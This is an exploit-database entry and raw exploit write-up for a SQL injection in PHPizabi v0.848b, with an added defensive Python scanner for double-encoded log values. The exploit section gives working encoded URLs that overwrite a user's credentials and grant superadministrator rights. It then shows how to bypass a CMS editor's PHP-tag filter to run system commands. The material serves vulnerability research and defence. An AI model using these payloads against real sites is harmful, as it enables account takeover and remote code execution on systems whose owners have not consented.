vendor:
PHPizabi
by:
Nine:Situations:Group::bookoo
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPizabi
Affected Version From: v0.848b C1 HFP1
Affected Version To: v0.848b C1 HFP1
Patch Exists: NO
Related CWE: N/A
CPE: a:phpizabi:phpizabi:0.848b_c1_hfp1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

A SQL injection vulnerability exists in the /theme/default/proc.inc.php file of PHPizabi v0.848b C1 HFP1. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an authenticated user. This URL contains a malicious SQL query which can be used to change the username and password of an existing user, grant the attacker admin rights, and execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Exploit-DB raw data:

--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

	function bufferProcParse($buffer) {
		global $CONF;
		
		$tpl = new template;
		$tpl -> LoadThis($buffer);
		// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
		if (isset($_GET["notepad_body"])) {
			myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
			me("flush");
		}
...

note urldecode() ...
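The point behind "note urldecode()", as an added example that is not part of the advisory: PHP fills $_GET from the query string already decoded once, so calling urldecode() on that entry decodes a second time, and a quote sent as %2527 only surfaces after that second pass, where nothing that inspected $_GET could see it. The script below models both decodes and scans constructed access-log lines for notepad_body values whose SQL metacharacters appear only after the second decode; the combined log format, the parameter name and the sample lines are assumptions.

```python
from urllib.parse import unquote_plus, urlsplit

# SQL metacharacters whose appearance only after a second decode marks a value
# crafted for code that calls urldecode() on an already-decoded $_GET entry.
SQL_META = ("'", '"', "\\", ";", "/*", "--")

def decode_twice(raw: str) -> str:
    """Value proc.inc.php actually uses: the web server/PHP decode the query
    string once into $_GET, then urldecode() decodes that entry again."""
    return unquote_plus(unquote_plus(raw))

def late_metachars(raw: str) -> list[str]:
    """SQL metacharacters present in the twice-decoded value but absent from the
    once-decoded one: a filter that inspected $_GET could never have seen them."""
    once, twice = unquote_plus(raw), decode_twice(raw)
    return [m for m in SQL_META if m in twice and m not in once]

def raw_query_params(target: str) -> list[tuple[str, str]]:
    """(name, still-encoded value) pairs. parse_qs() is avoided on purpose:
    it would decode the value once and hide the encoding layers."""
    pairs = []
    for chunk in urlsplit(target).query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), value))
    return pairs

def scan_access_log(lines: list[str], param: str = "notepad_body") -> list[tuple[str, list[str]]]:
    """(client, late metacharacters) for requests whose `param` value only turns
    into SQL syntax after the second decode. Assumes combined-log format lines."""
    hits = []
    for line in lines:
        try:
            target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue  # malformed line, skip it
        for name, raw in raw_query_params(target):
            meta = late_metachars(raw)
            if name == param and meta:
                hits.append((line.split(" ", 1)[0], meta))
    return hits

# Constructed sample lines (not from the advisory): a benign value, a singly
# encoded apostrophe, and a doubly encoded value shaped like the advisory's URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Mar/2009:10:01:02 +0000] "GET /phpizabi/?notepad_body=hello%20world HTTP/1.1" 200 512',
    '10.0.0.5 - - [24/Mar/2009:10:01:09 +0000] "GET /phpizabi/?notepad_body=it%27s+fine HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Mar/2009:10:02:33 +0000] "GET /phpizabi/?notepad_body=%2527%2C+x+%3D+1%252F%252A HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Mar/2009:10:02:40 +0000] "GET /phpizabi/?L=admin.index HTTP/1.1" 200 512',
]
```

Only the third request is reported: the singly encoded apostrophe in the second line is already visible in $_GET, so it is not a double-encoding indicator.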

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

...
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
			
			$body =
				"<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n<!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
			;
			
			fwrite($handle, $body);
			fclose($handle);
...

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

...
--------------------------------------------------------------------------------

# milw0rm.com [2009-03-24]